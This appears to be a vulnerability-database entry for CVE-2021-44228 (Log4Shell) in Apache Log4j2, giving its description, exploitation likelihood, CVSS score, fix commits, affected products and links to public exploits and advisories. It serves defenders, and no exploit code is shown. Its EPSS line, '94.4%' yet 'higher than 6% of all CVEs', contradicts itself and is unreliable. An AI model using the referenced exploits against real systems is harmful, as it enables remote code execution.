CVE-2021-44228

critical-risk

Published 2021-12-10

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Do I need to act?

94.4% chance of exploitation in next 30 days

EPSS score — higher than 6% of all CVEs

CISA KEV: actively exploited in the wild

On the Known Exploited Vulnerabilities catalog — federal agencies must patch

3 public exploits available

51183, 50592, 50590

Fix available

Upgrade to: 38513a7d57343881f7bf58f37e67d6a87e0a47c5, ad361d2e517e765f69db464d9407ac2dd80bc93e, c30a1398a6697fb832c650870c44284d0052103e, 4eb3cf16d99f0332878b1b57f2b22b0fd737602f, 6b788facd3479dfe9052b3a5e13f6603dce8c16f, 6b788facd3479dfe9052b3a5e13f6603dce8c16f, 6b788facd3479dfe9052b3a5e13f6603dce8c16f, 901c8714622056af05d757d9360b1d384604a4da, 6b788facd3479dfe9052b3a5e13f6603dce8c16f

CVSS 10.0/10 Critical

NETWORK / LOW complexity

Affected Products (20)

6Bk1602-0Aa12-0Tp0 Firmware

6Bk1602-0Aa22-0Tp0 Firmware

6Bk1602-0Aa32-0Tp0 Firmware

6Bk1602-0Aa42-0Tp0 Firmware

6Bk1602-0Aa52-0Tp0 Firmware

Log4J

Sppa-T3000 Ses3000 Firmware

Capital

Comos

Desigo Cc Advanced Reports

Affected Vendors

Cisco Debian Apache Apple Siemens Intel Sonicwall Fedoraproject Netapp Bentley Snowsoftware Percussion

References (103)

Third Party Advisory http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Exe...

Third Party Advisory http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.h...

Exploit http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Dis...

Exploit http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Exe...

Third Party Advisory http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html

Third Party Advisory http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html

Third Party Advisory http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.htm...

Third Party Advisory http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Byp...

Broken Link http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html

Exploit http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4...

Exploit http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html

Exploit http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticate...

Exploit http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenti...

Third Party Advisory http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-...

Exploit http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-...

Third Party Advisory http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Exe...

Exploit http://seclists.org/fulldisclosure/2022/Dec/2

Mailing List http://seclists.org/fulldisclosure/2022/Jul/11

Mailing List http://seclists.org/fulldisclosure/2022/Mar/23

Mailing List http://www.openwall.com/lists/oss-security/2021/12/10/1

and 83 more references

Get this data via API

curl -H "Authorization: Bearer YOUR_KEY" \
  https://cyber.phasetransitions.ai/api/v1/cves/CVE-2021-44228

Free tier: 100 requests/day, no credit card.

/ 100

critical-risk

Severity 33/34 · Critical

Exploitability 27/34 · High

Exposure 33/34 · Critical